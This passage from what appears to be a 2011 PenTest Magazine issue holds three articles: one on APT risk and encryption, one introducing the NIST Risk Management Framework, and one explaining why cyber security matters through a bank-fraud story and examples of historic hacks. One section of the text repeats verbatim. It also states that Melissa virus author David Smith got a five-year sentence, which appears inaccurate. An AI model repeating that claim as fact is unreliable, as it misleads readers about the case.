security control whatsoever.<br />
Page 33 http://pentestmag.com
If we have made an in-depth risk analysis (sorry if I<br />
insist), we should know that even when these devices<br />
are not company-owned, we still need to include them<br />
in the strategic security plan; to say it clearly: wherever<br />
there is company valuable information, there are no<br />
excuses for not protecting it.<br />
Illegal Software, Dual Problem<br />
I Unfortunately it is true that many people use illegal<br />
software as a protection method!<br />
Besides being a logical nonsense, it entails a severe<br />
risk since there are many documented threats hidden in<br />
antivirus software or other kinds of allegedly fake antimalware;<br />
not to mention illegal software infection rates,<br />
usually downloaded from sites specialized in these<br />
matters.<br />
We are all responsible for bringing awareness both to<br />
companies and individuals; similarly we are accountable<br />
for pursuing the necessary know-how to understand this<br />
world we live in and decrease risk exposure.<br />
Keep One’s Eyes On The Ball<br />
Many of the APT type attacks have been targeted<br />
to access and expose an organization’s sensitive<br />
information.<br />
In some cases, information disclosed was not that<br />
valuable per se; but the discredit caused by such a<br />
disclosure was!<br />
What would happen if we could protect information in<br />
such a way that even when accessed by an attacker the<br />
same could not be used? Well, that’s what I mean when<br />
I say we should keep one’s eyes on the ball!<br />
Some experts recommend use of different encryption<br />
techniques (more or less complex and focused on<br />
different devices) as a way to reduce information<br />
exposure degree.<br />
Even when information could be accessed and<br />
extracted from the organization, decryption would be<br />
such a complex process that it would take hundreds<br />
or thousands of years to decrypt, using last generation<br />
computers, thus making its practical use impossible.<br />
This clearly raises many other technical nature<br />
challenges, e.g. digital certificates custody, though if we<br />
consider we still have the chance to apply much simpler<br />
techniques for applications like files encoding and<br />
database encryption for applications, just to mention a<br />
few, this kind of risk mitigation techniques could have<br />
their preferential space in the next future of information<br />
security.<br />
Give Him An Inch And He Will Take A Mile<br />
Stuxnet, Operation Shady RAT and the attacks against<br />
the International Olympic Committee and the World<br />
starterkit 02/2011(2)<br />
SOCIAL FRAUD<br />
Anti-Doping Agency (reportedly hidden and active at<br />
least during 5 years), among many others, are clear<br />
examples of what could happen but are not decisive<br />
when it comes to analyzing the future; all we can attest<br />
is not knowing what new threats will appear.<br />
However, we’ve got so much to do before giving up,<br />
some people even say that this is a war and that we can<br />
win it; I believe it’s too soon to say that, though without<br />
a doubt there’s plenty of room for improvement in most<br />
companies and public agencies information security<br />
management systems.<br />
There is one point where many experts agree; i.e.<br />
that new attacks call for new monitoring, detection, and<br />
prevention techniques; however these techniques do<br />
exist, the problem is just that they are not used widely<br />
enough.<br />
Just to give you an example; the SIEM (Security<br />
Information and Event Management) notion is<br />
practically unknown and partially implemented by many<br />
organizations, missing the opportunity to have at least<br />
integral monitoring systems that enable threat detection<br />
from the behavioral standpoint, supplementing pattern<br />
detection systems and other heuristic techniques; a<br />
value added for this kind of systems is that they enable<br />
audit leads, very useful to minimize impact in the event<br />
of an attack!<br />
GABRIEL MARCOS<br />
Twitter: @jarvel<br />
Page 34 http://pentestmag.com
If we have made an in-depth risk analysis (sorry if I<br />
insist), we should know that even when these devices<br />
are not company-owned, we still need to include them<br />
in the strategic security plan; to say it clearly: wherever<br />
there is company valuable information, there are no<br />
excuses for not protecting it.<br />
Illegal Software, Dual Problem<br />
I Unfortunately it is true that many people use illegal<br />
software as a protection method!<br />
Besides being a logical nonsense, it entails a severe<br />
risk since there are many documented threats hidden in<br />
antivirus software or other kinds of allegedly fake antimalware;<br />
not to mention illegal software infection rates,<br />
usually downloaded from sites specialized in these<br />
matters.<br />
We are all responsible for bringing awareness both to<br />
companies and individuals; similarly we are accountable<br />
for pursuing the necessary know-how to understand this<br />
world we live in and decrease risk exposure.<br />
Keep One’s Eyes On The Ball<br />
Many of the APT type attacks have been targeted<br />
to access and expose an organization’s sensitive<br />
information.<br />
In some cases, information disclosed was not that<br />
valuable per se; but the discredit caused by such a<br />
disclosure was!<br />
What would happen if we could protect information in<br />
such a way that even when accessed by an attacker the<br />
same could not be used? Well, that’s what I mean when<br />
I say we should keep one’s eyes on the ball!<br />
Some experts recommend use of different encryption<br />
techniques (more or less complex and focused on<br />
different devices) as a way to reduce information<br />
exposure degree.<br />
Even when information could be accessed and<br />
extracted from the organization, decryption would be<br />
such a complex process that it would take hundreds<br />
or thousands of years to decrypt, using last generation<br />
computers, thus making its practical use impossible.<br />
This clearly raises many other technical nature<br />
challenges, e.g. digital certificates custody, though if we<br />
consider we still have the chance to apply much simpler<br />
techniques for applications like files encoding and<br />
database encryption for applications, just to mention a<br />
few, this kind of risk mitigation techniques could have<br />
their preferential space in the next future of information<br />
security.<br />
Give Him An Inch And He Will Take A Mile<br />
Stuxnet, Operation Shady RAT and the attacks against<br />
the International Olympic Committee and the World<br />
starterkit 02/2011(2)<br />
SOCIAL FRAUD<br />
Anti-Doping Agency (reportedly hidden and active at<br />
least during 5 years), among many others, are clear<br />
examples of what could happen but are not decisive<br />
when it comes to analyzing the future; all we can attest<br />
is not knowing what new threats will appear.<br />
However, we’ve got so much to do before giving up,<br />
some people even say that this is a war and that we can<br />
win it; I believe it’s too soon to say that, though without<br />
a doubt there’s plenty of room for improvement in most<br />
companies and public agencies information security<br />
management systems.<br />
There is one point where many experts agree; i.e.<br />
that new attacks call for new monitoring, detection, and<br />
prevention techniques; however these techniques do<br />
exist, the problem is just that they are not used widely<br />
enough.<br />
Just to give you an example; the SIEM (Security<br />
Information and Event Management) notion is<br />
practically unknown and partially implemented by many<br />
organizations, missing the opportunity to have at least<br />
integral monitoring systems that enable threat detection<br />
from the behavioral standpoint, supplementing pattern<br />
detection systems and other heuristic techniques; a<br />
value added for this kind of systems is that they enable<br />
audit leads, very useful to minimize impact in the event<br />
of an attack!<br />
GABRIEL MARCOS<br />
Twitter: @jarvel<br />
Page 34 http://pentestmag.com
An Introduction<br />
to the NIST Risk Management Framework<br />
This article will introduce the NIST Risk Management Framework.<br />
It will cover the steps of system categorization, the selection of<br />
security controls, the implementation of the selected controls,<br />
the assessment of control implementation, and the system<br />
authorization process.<br />
Creating an effective information security<br />
program can be a daunting task. If you are<br />
lucky, you work for a company with an existing<br />
security program, clearly defined security mandates,<br />
and support from senior management. But, what do<br />
you d o if you are given the task of creating a security<br />
program for your organization? This article will guide<br />
you through the process of creating an effective security<br />
program using the NIST risk management framework.<br />
Even if you are not directly responsible for creating a<br />
security program, you may find it helpful to understand<br />
how security programs are created and why certain<br />
items are prioritized by auditors.<br />
It seems like information security is in the news on<br />
a daily basis. We’ve all seen the news stories about<br />
companies that have been breached. The motives for<br />
the breaches may range from financial gain, industrial<br />
espionage, revenge against a perceived injustice,<br />
or the political goals of terrorists. In response to the<br />
many breaches, new laws are being passed mandating<br />
protection of certain types of information. Even if your<br />
organization is not directly impacted by new statues,<br />
your organization may be forced to create an information<br />
security program to comply with customer requirements<br />
or in response to a security incident.<br />
External forces requiring the creation of a security<br />
program are not enough to ensure a successful program;<br />
you need the support and commitment of senior<br />
starterkit 02/2011(2)<br />
SOLUTIONS<br />
management for your efforts to succeed. If management<br />
is being forced to create a security program, they may<br />
resent the requirement and provide minimal support.<br />
It is quite possible the first challenge you may face is<br />
overcoming the resistance of management.<br />
Management usually focuses on increasing<br />
revenues and reducing costs. It is only natural for<br />
them to view an information security program as an<br />
added cost and a productivity barrier to the business.<br />
If you are able to demonstrate how a security program<br />
can not only meet your compliance requirements but,<br />
add value to the business, you will gain more support<br />
for your efforts.<br />
Your first task is to understand the goals of the<br />
organization. Once you understand the organizational<br />
goals, it is helpful to frame communications with<br />
management in the terms important to them. Security<br />
is usually discussed in terms of confidentiality, integrity,<br />
and availability, often referred to as the CIA triad.<br />
Improved integrity can reduce the costs associated<br />
with rework and correction. Improved availability can<br />
increase revenues and improve customer satisfaction.<br />
Improved confidentiality can protect your intellectual<br />
property. An information security program can<br />
also improve operational consistency as part of an<br />
organizational risk management program.<br />
After obtaining the support of senior management,<br />
a security standard should be chosen. There are<br />
Page 36 http://pentestmag.com
several security standards in widespread use.<br />
The most common standards are ISO27001,<br />
COBIT, and NIST. The International Organization<br />
for Standardization (ISO) [1] and the International<br />
Electrotechnical Commission (IEC) [2] created the<br />
ISO27001 [3] standard. This global standard is used<br />
heavily in Europe. The Information Systems Audit<br />
and Control Association (ISACA) [4] created the<br />
Control Objectives for Information related Technology<br />
(COBIT) [5] that is widely used for compliance with<br />
the US Sarbanes Oxley Act (SOX) requirements for<br />
US publicly traded companies. The National Institute<br />
of Standards and Technology (NIST) has developed a<br />
series of standards that are published at the Computer<br />
Security Resource Center [6]. The NIST standards<br />
are widely used by US government agencies. This<br />
article will discuss using the NIST Risk Management<br />
Framework but, the basic steps also apply to the other<br />
frameworks.<br />
After selecting a security framework, the system<br />
boundaries and information assets should be identified.<br />
It is easy to overlook information that is not contained<br />
in the computer systems such as paper forms. All<br />
information should be considered, even items not<br />
directly covered by regulations. For example, if your<br />
organization is a health care company, it would be<br />
easy to focus solely on the patient health information<br />
but, overlook the employee payroll information, the<br />
customer billing data, or the integrity of the financial<br />
systems.<br />
Once the information assets have been identified,<br />
you need to determine the business unit that owns the<br />
information resource. Meetings should be scheduled<br />
with the senior manager in charge of the unit so you<br />
can perform a business impact analysis (BIA). A<br />
business impact analysis will attempt to estimate the<br />
mission impact of failure to meet the security objectives<br />
of confidentiality, integrity, and availability. NIST Federal<br />
Information Processing Standards Publication 199<br />
(NIST FIPS Pub 199 [7]) recommends classifying<br />
systems into the categories of Low, Medium, and High<br />
impact.<br />
A system is considered low impact if the loss of<br />
confidentiality, integrity, or availability has a limited<br />
adverse effect on the organization. The system is<br />
considered medium impact if the loss of confidentiality,<br />
integrity, or availability has a severe impact on the<br />
organization. The system is considered high impact if<br />
they loss of confidentiality, integrity, or availability would<br />
have a catastrophic effect on the organization. When<br />
evaluating a system, you should consider confidentiality,<br />
integrity, and availability separately. The overall score of<br />
the asset is the highest rating of the three categories.<br />
starterkit 02/2011(2)<br />
A rating of not applicable should not be used since<br />
each system should have a low water mark of business<br />
impact.<br />
As an example, let’s consider a public facing<br />
webserver for a movie theater that advertises the<br />
currently showing films and show times. The information<br />
on the website is expected to be publicly available so the<br />
business impact for disclosure is considered low. Since<br />
the website is frequently updated with new movies and<br />
show schedules, website defacement or inaccurate<br />
information would be quickly corrected and result in a<br />
low business impact for integrity. Since many patrons<br />
of the movie theater check the website for movies<br />
and schedules when considering attending the movie,<br />
a loss of availability for several weeks could have a<br />
catastrophic impact on the business resulting in a rating<br />
of high impact for availability. The highest score of the<br />
confidentiality, integrity, and availability categories is<br />
high so the overall score of the system is high.<br />
It is important when characterizing the impact level<br />
of the systems to evaluate both user data as well<br />
as system data. System information could include<br />
password files, encryption keys and certificates,<br />
authenticated sessions, etc. Instead of focusing<br />
entirely on the individual system, the system should<br />
be evaluated in the context of the overall enterprise.<br />
For example, a low impact system could be used<br />
to compromise a higher impact system if network<br />
segmentation and firewall rules allow an attacker to<br />
pivot in the network or provide other resources for an<br />
attacker. The preliminary categorization of the system<br />
should be adjusted to reflect any legal or contractual<br />
obligations, the organizational environment,<br />
organizational mission and goals, and data sharing<br />
requirements.<br />
The information obtained through the system<br />
characterization will be used for several activities<br />
in the development of a security program. Business<br />
continuity and disaster recovery planning activity needs<br />
the business impact analysis (BIA) to determine the<br />
maximum tolerable downtime (MTD) used to establish<br />
the recovery time objectives (RTO). Enterprise risk<br />
management needs the BIA to identify resources<br />
that need to be protected during the enterprise risk<br />
assessment process. Capital planning needs the<br />
BIA to properly allocate resources when budgeting.<br />
Enterprise architects and system designers need<br />
the BIA to align technical initiatives with business<br />
priorities. Vendor management processes need a BIA<br />
to define data protection requirements when sharing<br />
data and interconnecting systems.<br />
After categorizing the security level of the information<br />
asset, appropriate controls should be considered. The<br />
Page 37 http://pentestmag.com
National Institute of Standards and Technology Special<br />
Publication 800-53 [8] (NIST SP800-53) covers control<br />
selection in 18 different areas:<br />
• Access Control<br />
• Awareness and Training<br />
• Audit and Accountability<br />
• Security Assessment and Authorization<br />
• Configuration Management<br />
• Contingency Planning<br />
• Identification and Authentication<br />
• Incident Response<br />
• Maintenance, Media Protection<br />
• Physical and Environmental Protection<br />
• Planning, Personnel Security<br />
• Risk Assessment<br />
• System and Services Acquisition<br />
• System and Communications Protection<br />
• System and Information Integrity<br />
• Program Management<br />
For each control objective listed, there is a<br />
corresponding set of recommended controls for<br />
each of the impact levels. Since there are so many<br />
controls to consider, controls are assigned a priority<br />
code that assists when planning an implementation<br />
sequence. Controls can be implemented as either a<br />
common control that applies to multiple systems or<br />
as a system-specific control that apply to individual<br />
systems. Compensating controls, should be evaluated<br />
if a primary control cannot be implemented due<br />
to technical or other reasons. NIST SP 800-18 [9]<br />
defines compensating controls as the management,<br />
operational, or technical controls employed by an<br />
agency in lieu of prescribed controls in the low,<br />
moderate, or high security control baselines, which<br />
provide equivalent or comparable protection for an<br />
information system.<br />
For each system, a system security plan should be<br />
prepared using the business impact analysis and the<br />
selected security controls. After the system security<br />
plan has been completed, it should be presented to the<br />
system owner for approval. NIST SP 800-18 defines the<br />
items to document in a system security plan:<br />
• System Name and Identifier<br />
• System Categorization<br />
• System Owner<br />
• Authorizing Official<br />
• Other Designated Contacts<br />
• Assignment of Security Responsibility<br />
• System Operational Status<br />
• Information System Type<br />
starterkit 02/2011(2)<br />
SOLUTIONS<br />
• General Description/Purpose<br />
• System Environment<br />
• System Interconnection/Information Sharing<br />
• Law, Regulations, and Policies Affecting the<br />
System<br />
• Security Control Selection<br />
• Minimum Security Controls<br />
• Completion and Approval Dates<br />
Once the system security plan has been approved by<br />
the authorizing official, control implementation can<br />
begin. NIST SP800-70 [10] and the other documents<br />
in the NIST SP800 series provide guidance on control<br />
implementation. Configuration checklists published at<br />
the National Checklist Program Repository [11] provide<br />
detailed configuration guidance with recommended<br />
settings. The checklists are provided in different<br />
formats for use. Tier I checklists are human readable,<br />
Tier II are machine readable non-SCAP, Tier III should<br />
work in a SCAP validated tool, and Tier IV will work in<br />
a SCAP validated tool.<br />
Implementing controls is only a portion of the actual<br />
work. The controls need to be tested to verify they have<br />
been implemented correctly, operating as intended, and<br />
producing the desired security outcomes with respect<br />
to meeting the security requirements of the system.<br />
NIST SP800-53A [12] provides guidance on assessing<br />
system security controls.<br />
The recommended process begins with preparing<br />
for the security controls assessment. The preparation<br />
process includes gathering the information needed<br />
by the assessors, setting the expectations of affected<br />
parties regarding scope, depth, time schedule, gathering<br />
supporting documentation, etc. Resources will need to<br />
be obtained and assessor/auditors selected. Ideally,<br />
the assessors should have independence from the<br />
business and technology groups so they can provide an<br />
unbiased review.<br />
The second step of the assessment process is<br />
to create an assessment plan. The plan should<br />
determine the scope of the assessment and which<br />
controls will be tested. Specific test procedures and<br />
assessment depth should be determined. Three<br />
types of assessment procedures are defined: controls<br />
examination, interview personnel, and controls testing.<br />
Three assessment procedure depths are defined<br />
progressing from the basic examination to the focused<br />
examination and leading to the comprehensive<br />
examination. Specific tests may need to be created to<br />
assess items not sufficiently covered by NIST SP800-<br />
53A or to meet organizational requirements. After the<br />
plan has been completed, it will need to be approved<br />
prior to testing.<br />
Page 38 http://pentestmag.com
Resource<br />
• http://www.iso.org/iso/home.html [1]<br />
• http://www.iec.ch/ [2]<br />
• http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumber=42103 [3]<br />
• https://www.isaca.org/Pages/default.aspx [4]<br />
• http://www.isaca.org/Knowledge-Center/cobit/Pages/Downloads.aspx [5]<br />
• http://csrc.nist.gov/ [6]<br />
• http://csrc.nist.gov/publications/ps/ps199/FIPS-PUB-199-nal.pdf [7]<br />
• http://csrc.nist.gov/publications/nistpubs/800-53-Rev3/sp800-53-rev3-nal_updated-errata_05-01-2010.pdf [8]<br />
• http://csrc.nist.gov/publications/nistpubs/800-18-Rev1/sp800-18-Rev1-nal.pdf [9]<br />
• http://csrc.nist.gov/publications/nistpubs/800-70-rev2/SP800-70-rev2.pdf [10]<br />
• http://web.nvd.nist.gov/view/ncp/repository [11]<br />
• http://csrc.nist.gov/publications/nistpubs/800-53A-rev1/sp800-53A-rev1-nal.pdf [12]<br />
The actual assessment begins with a set of<br />
determination statements that related to the security<br />
controls implemented from the catalog in NIST SP800-<br />
53. An individual control listed in NIST SP800-53 may<br />
have multiple assessment objectives listed for the<br />
control in NIST SP800-53A.<br />
For example, NIST SP800-53 provides control AC-<br />
1 Access Control Policies and Procedures. NIST<br />
SP800-53A has two control objectives listed: AC-1.1<br />
and AC-1.2. NIST SP800-53A assessment objective<br />
AC-1.1 determines if the policy and procedures exist,<br />
contain certain key items, distributes the policy,<br />
develops procedures, and distributes the procedures<br />
to the appropriate staff. Control objective AC-1.2<br />
determines if the policies and procedures have a<br />
defined update schedule and the organization actually<br />
updates the policies and procedures according to the<br />
schedule.<br />
The output of the security control assessment is the<br />
security assessment report. The security assessment<br />
report details the items tested and documents the results<br />
to provide evidence for each finding. For each item a<br />
rating of either satisfied (S) or other than satisfied (O).<br />
The organization may wish to have a summary report<br />
that provides the highlights of the report, a synopsis of<br />
key findings, and recommendations for addressing the<br />
deficiencies.<br />
The security assessment report will need to be<br />
reviewed by senior management. Management may<br />
determine that certain items present a lower or higher<br />
risk than indicated in the controls assessments and<br />
risk assessments based on the organization mission<br />
and the operational environment. Items that should<br />
be addressed are used to create a plan of actions<br />
and milestones (POAM) that management can use to<br />
direct remediation efforts. After management review,<br />
the system security plan and risk assessment should<br />
be updated accordingly. It should be <strong>note</strong>d that some<br />
risk will remain after the implementation of controls.<br />
This residual risk may be accepted by management<br />
starterkit 02/2011(2)<br />
or transferred to others through actions such as<br />
obtaining insurance policies.<br />
The risk management cycle is a continuous process.<br />
After these steps have been completed, the results<br />
should be used as a starting point for a new risk<br />
management cycle. The risk management framework<br />
can be adapted to the individual requirements of the<br />
organization. Since technologies and threats evolve<br />
over time, the risk management cycle should be<br />
repeated at regular intervals. The process can be used<br />
for new systems under development to ensure proper<br />
control selection or it can be applied to existing system<br />
to perform a gap analysis to evaluate current controls<br />
with the desired state.<br />
BART HOPPER<br />
Bart Hopper has earned numerous certications during<br />
his 18 years as an information technology professional.<br />
His certications cover the areas of information security,<br />
Windows administration, Unix administration, and database<br />
administration. He lives in Nashville, Tennessee.<br />
Page 39 http://pentestmag.com
SOLUTIONS<br />
Why is Cyber Security<br />
Important?<br />
Cyber Security – Who is Responsible?<br />
Martha, the branch manager of a small private bank, while<br />
casually checking some bank statements noticed a large number<br />
of unusual transactions on a number of savings accounts<br />
belonging to pensioners. It appeared as though a number of<br />
pensioners had suddenly decided to transfer a portion of their<br />
pension money into a couple of accounts belonging to a Mr. A and<br />
Mrs. C, who had then withdrawn all the money from various ATMS.<br />
One of the pensioners was her own uncle. A<br />
puzzled Martha decided to contact her uncle<br />
who denied having made any such payments<br />
to anyone. Besides, he was not tech savvy to operate a<br />
computer and transfer money into other accounts.<br />
The bank had recently computerized their systems<br />
and implemented a basic version of online banking<br />
and had enrolled a number of customers to transact<br />
online. But the bank had no qualified IT manager and<br />
Martha also doubled up as a tech manager in charge<br />
of babysitting the systems. Only Martha had the admin<br />
rights to conduct the end to end steps needed to<br />
complete the money transfers, and she had definitely<br />
not done those transactions. And the time stamps of<br />
the transactions were all on weekends and late nights<br />
when she and no one else were available in the bank<br />
to do any hanky panky. Martha could not decipher<br />
what could have gone wrong. Suspecting something<br />
bigger she immediately notified the bank head, who<br />
then called the police. The police brought their techie<br />
who immediately discovered that many accounts have<br />
been hacked by someone who had systematically<br />
siphoned off thousands of dollars remotely using the<br />
loopholes of the basic online system. However, the<br />
police could do nothing because the bank’s computer<br />
systems were not capable of providing the necessary<br />
logs and other details needed to track the thieves.<br />
After a brainstorming internal discussion the bank<br />
starterkit 02/2011(2)<br />
management decided to absorb the losses to avoid<br />
bad publicity and media attention. And the thieves<br />
who did this act were never caught and were probably<br />
enjoying a holiday somewhere. In other words, the<br />
bank had been robbed.<br />
Until a decade ago if you had to rob a bank it<br />
was necessary to indulge in an armed invasion,<br />
take hostages, spill blood, use getaway cars, etc.,<br />
along with all the associated risks of botching up the<br />
operation. Or you had to indulge in excellent forgery<br />
and duplicate paperwork to siphon off funds. But today<br />
it is not necessary for you to even visit a bank to loot<br />
it without raising any alarms for weeks. So how is it<br />
now easy for criminals to loot a bank? The simple<br />
answer is the Internet. Today, many aspects of our<br />
life like banking, purchases, communications, etc.,<br />
and even the militaries depend on the internet and<br />
worldwide connectivity. While the internet offers several<br />
conveniences, it can also ruin your life in an instant<br />
with threats like identity thefts, online scams and other<br />
threats. For example, a tech savvy thief can simply sit in<br />
his home comfortably and leisurely hack into the bank’s<br />
computer system using some nasty software to swindle<br />
hundreds of customers of their money. While this is an<br />
example of plain theft, the internet can also be used for<br />
much bigger crimes. For example, rogue countries can<br />
launch a mega cyber attack on another country and<br />
cripple its websites, banking systems, communications,<br />
Page 40 http://pentestmag.com
etc., and create mayhem. And all of these nefarious<br />
activities can be done anonymously sitting anywhere<br />
in the world. Worldwide hundreds of companies get<br />
hacked into and many do not even realize they have<br />
been hacked because they will not have the required<br />
expertise to detect it. Sometimes the hacking can be<br />
harmless and sometimes it can be deadly and can even<br />
ruin an organization. For example, the recent hacking<br />
of Sony Play station network caused a great amount of<br />
damage and annoyance to millions of users. The breach<br />
also led to the theft of the data of more than 70 million<br />
users and took Sony several days to restore and fix the<br />
system. Sony is not alone. Unknown to most people and<br />
business managers there have been scores of computer<br />
attacks, network intrusions, or data breaches over the<br />
last few years. Every time we make a purchase online,<br />
visit a website, carry out an online banking transaction,<br />
we are exposing ourselves to risk. Here is a small list of<br />
major hackings that happened over the last few years.<br />
• Citibank: A Russian computer geek called Vladimir<br />
Levin was the first person to hack into a bank to<br />
extract money. As early as 1995, he hacked into<br />
Citibank and robbed $10 million. Interpol arrested<br />
him in the UK in 1995, after he had transferred<br />
money to his accounts in the US, Finland, Holland,<br />
Germany and Israel.<br />
• A US hacker called Timothy Lloyd planted a few<br />
lines of malicious code in the computer network of<br />
Omega Engineering, which was a prime supplier<br />
of components for NASA and the US Navy. The<br />
code was actually a logic bomb designed to<br />
delete software running Omega’s manufacturing<br />
operations. Omega lost $10 million due to the<br />
attack.<br />
• The Melissa virus was the first of its kind to wreak<br />
damage on a global scale. Written by one David<br />
Smith, Melissa spread itself to thousands of<br />
companies worldwide destroying and destabilizing<br />
their computer networks. Damages reported<br />
amounted to nearly $400 million. Smith was<br />
arrested and sentenced to five years in prison.<br />
• Google gmail: Chinese hackers were able to take<br />
over hundreds of gmail accounts, including those of<br />
some US defence personnel, political activists and<br />
many others.<br />
• NASA: Many servers in NASA were penetrated by<br />
hackers who were able to steal confidential data<br />
related to satellites and imagery.<br />
And the list can go on and on. Some of the common<br />
ways computers can get hacked or disabled will be as<br />
follows.<br />
starterkit 02/2011(2)<br />
Password Stealing<br />
A password is just a string of keyboard characters, which<br />
a person must remember and type into a computer<br />
terminal when required. There are several methods for<br />
cracking a password. Specialized password cracking<br />
softwares are now available that can crack your<br />
password using dictionary attacks, brute force attacks,<br />
and hybrid attacks.<br />
Trojan Horses<br />
A Trojan horse is a malicious software surreptitiously<br />
delivered inside a computer. The malicious Trojan<br />
horse can be programs that destroy hard drives, corrupt<br />
files, record keystrokes, monitor network traffic, track<br />
Web usage, allow remote control, transmit data files<br />
to others, launch attacks against other targets, and<br />
more. All a Trojan horse attack needs to be successful<br />
is a single user to execute the program. Once that is<br />
accomplished, the malicious software is automatically<br />
launched often without any symptoms of unwanted<br />
activity. A Trojan horse could be delivered via e-mail<br />
as an attachment, or it could be presented on a Web<br />
site as a download, etc. In any case, your protection<br />
lies in malicious code detection tools, modern anti-virus<br />
protection, other forms of malware scanners, and user<br />
education.<br />
Denial of Service<br />
Sometimes a hacker uses a network of computers to<br />
sabotage a specific Web site or server. The idea is to<br />
make all the computers to contact a specific server or<br />
Web site repeatedly. The sudden increase in traffic can<br />
cause the site to become very slow or just collapse.<br />
Sometimes the traffic is enough to shut the site down<br />
completely. This is called Denial of Service (DoS)<br />
attack.<br />
Exploiting Settings<br />
Attacking a target network or computer is easier when<br />
that target is using the defaults set by the manufacturer.<br />
Many attack tools and scripts assume that the target<br />
is configured using the default settings. Hence, one of<br />
the effective security precautions is simply to change<br />
the defaults. It is your responsibility to know about the<br />
defaults of the hardware and software products you<br />
use and change those defaults to custom settings. The<br />
more you customize your configurations and settings,<br />
the more your system will be incompatible with attack<br />
tools and exploitation scripts.<br />
Defacing Websites<br />
A fairly common form of external attack is web site<br />
defacing. Your company websites can be defaced<br />
Page 41 http://pentestmag.com
and nonsense information displayed. This attack uses<br />
password cracking to penetrate websites that the<br />
attacker wants to deface. Some of the common ways<br />
to get into a website is by dictionary attack. A dictionary<br />
file (a text file full of dictionary words) is loaded into<br />
a cracking application, which is run against common<br />
user accounts used by the application or website login.<br />
Because the majority of passwords are often simplistic,<br />
running a dictionary attack is often sufficient to do the<br />
job.<br />
Packet Sniffing<br />
Packet sniffer is an application that captures data<br />
packets, which can be used to capture passwords and<br />
other data in transit over the network.<br />
Key Loggers<br />
These are programs that record keystrokes made by a<br />
user, allowing crackers to discover passwords and login<br />
codes.<br />
Rootkits and Backdoors<br />
Rootkits are a collection of programs that permits<br />
administrator-level control of a computer. Hackers<br />
use rootkits to control computers and evade detection.<br />
Backdoors are methods of circumventing the normal<br />
operating-system procedures, allowing a cracker to<br />
access information on another computer.<br />
Spoong attack (Phishing)<br />
A spoofing attack usually involves a program, system, or<br />
website masquerading as another thereby being treated<br />
as a trusted system by a user or another program. The<br />
purpose of this is usually to fool programs, systems, or<br />
users into revealing confidential information, such as<br />
user names and passwords, to the attacker.<br />
Vulnerability Scanner<br />
A vulnerability scanner is a tool used to check computers<br />
and networks for known weaknesses. Hackers also<br />
commonly use port scanners. These softwares check<br />
to see which ports on a specified computer are open<br />
or available to access the computer. Once open ports<br />
are discovered smart programmers can access the<br />
computer or network and cause havoc.<br />
So how do you protect your organization from such<br />
attacks? The simple answer of avoiding the internet<br />
is not a feasible answer because the global economy<br />
now depends on the internet, and you cannot opt<br />
out of it. Hence, customers, businessmen and<br />
governments need additional confidence that their<br />
money, confidential documents, military secrets,<br />
starterkit 02/2011(2)<br />
SOLUTIONS<br />
etc., are not compromised by pranksters and<br />
enemies. Providing this additional confidence lies<br />
in implementing a proper cyber security system to<br />
prevent unauthorized entry into a computer network.<br />
However, an important question that arises in all<br />
these discussions is – who are the owners of cyber<br />
security in an organization? Most would immediately<br />
say the owners would (or should) be the person(s)<br />
supporting the IT equipment. After all, you might<br />
argue those techies are the ones babysitting the<br />
computer systems. But this is an incorrect assumption.<br />
Actually, the true owners of cyber security are the<br />
business managers of your organization. Though your<br />
organization may have hired some IT staff or external<br />
vendors to manage the IT infrastructure, but from a<br />
business perspective they are not the owners of your<br />
cyber security. For example, if your server gets hacked<br />
and funds stolen from customer accounts the techies<br />
cannot be solely blamed for the crime and reputation<br />
damage. They may technically operate the system, but<br />
it is your business managers who should understand<br />
the potential loss in terms of financial, reputation or<br />
legal aspects of cyber attacks. In most organizations<br />
business managers do not understand (or try to<br />
understand) the technical department’s work and<br />
constraints, and technical people do not understand (or<br />
try to understand) the business people’s needs. While<br />
this does not mean the business manager become<br />
techies themselves, they can assist in implementing<br />
cyber security by doing the following good deeds for<br />
their techies.<br />
Knowledge<br />
The advancement and easy availability of new and<br />
useful technologies today have enabled thousands<br />
of organizations worldwide to implement and become<br />
heavily dependent on technology for running their<br />
businesses. Today, it is not possible to run any<br />
organization, small or big, without the use of some<br />
computer- or telecom-related technology. With so much<br />
proliferation of hardware, software and networking<br />
equipment, it is necessary for business managers<br />
to be aware of the advantages and disadvantages<br />
of using technology. While it does not mean they<br />
start operating the computers themselves, business<br />
managers must understand what the loss is in terms of<br />
financial, reputation, regulatory or legal consequences<br />
for disasters related to cyber threats.<br />
Financial Support<br />
Provide necessary budgets for comprehensive<br />
maintenance of hardware, software, telecom equipment,<br />
spares, backup devices, etc. For example, suppose<br />
Page 42 http://pentestmag.com
your business managers do not approve the purchase<br />
of a good firewall and intrusion protection system, or fail<br />
to enroll into hardware maintenance for an important<br />
server – the IT staff will not be able to do much in the<br />
event of a hacking, data loss or some other technical<br />
problem on that server.<br />
Provide Proper Manpower<br />
Reduced manpower and facilities in critical areas will<br />
inevitably, directly or indirectly, affect the business. It<br />
is worth highlighting that no matter how secure the<br />
technology is people are still the key to real security.<br />
If employees do not see security as a top priority, then<br />
even the most secure system can easily be broken into.<br />
Even with robust technology, there is always a need<br />
for high-quality employees and a proper education<br />
in place between business and employee. After all,<br />
unprofessional or disaffected users all too often pass<br />
critical information like passwords, loopholes, codes,<br />
etc., to others. Secondly, your business managers must<br />
ensure that departments have the necessary manpower<br />
in all areas. It is very common in organizations to skimp<br />
on manpower when it comes to support, maintenance,<br />
etc., but demand the best from a slave-sized workforce.<br />
The common saying Hire an Einstein, but refuse his<br />
request for a blackboard describes a situation that is<br />
prevalent in many organizations worldwide.<br />
Implement recommendations<br />
Your business managers must listen to recommendations<br />
proposed by technical staff, support staff, etc, for<br />
implementing a proper hacker prevention environment.<br />
Establishing such a system is an expensive business.<br />
Not every critical IT function can be worked around<br />
with a low-cost alternative. It is a common practice<br />
in many organizations to ignore or avoid IT and non-<br />
IT recommendations by giving standard excuses,<br />
like cost, even though organizations will be perfectly<br />
capable of affording it. If you are serious about intrusion<br />
prevention, then your senior management must support<br />
the necessary costs and budgets for implementing all<br />
sensible recommendations, industry standards and<br />
workarounds necessary for intrusion prevention.<br />
Get involved<br />
Senior management, including the CEO, must get<br />
involved in all aspects of their organization’s intrusion<br />
prevention processes. You must have a Show me<br />
or Prove it to me attitude to ensure your business<br />
is truly protected. Nowadays, having a proper cyber<br />
security system for many organizations is a mandatory<br />
business and audit requirement. So it should not be<br />
taken lightly.<br />
starterkit 02/2011(2)<br />
Policies<br />
Just like other essential policies in HR, finance, etc,<br />
